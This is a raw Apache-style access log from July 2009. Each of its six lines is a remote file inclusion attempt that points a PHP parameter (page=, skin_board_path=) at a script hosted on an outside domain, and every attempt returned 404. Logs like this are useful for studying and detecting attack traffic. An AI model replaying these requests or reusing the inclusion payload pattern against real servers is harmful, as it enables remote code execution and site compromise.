211.230.156.161 - - [06/Jul/2009:03:41:08 -0400] "GET /logs/access_log.Q109061300/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:41:08 -0400] "GET /logs/access_log.Q109061300/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:41:40 -0400] "GET /logs/access_log.Q109061300/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:41:43 -0400] "GET /logs/access_log.Q109061300/index1.php?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:03:42:04 -0400] "GET /logs//rgboard//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 233 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:03:42:04 -0400] "GET //rgboard//include/mail.inc.php?skin_board_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
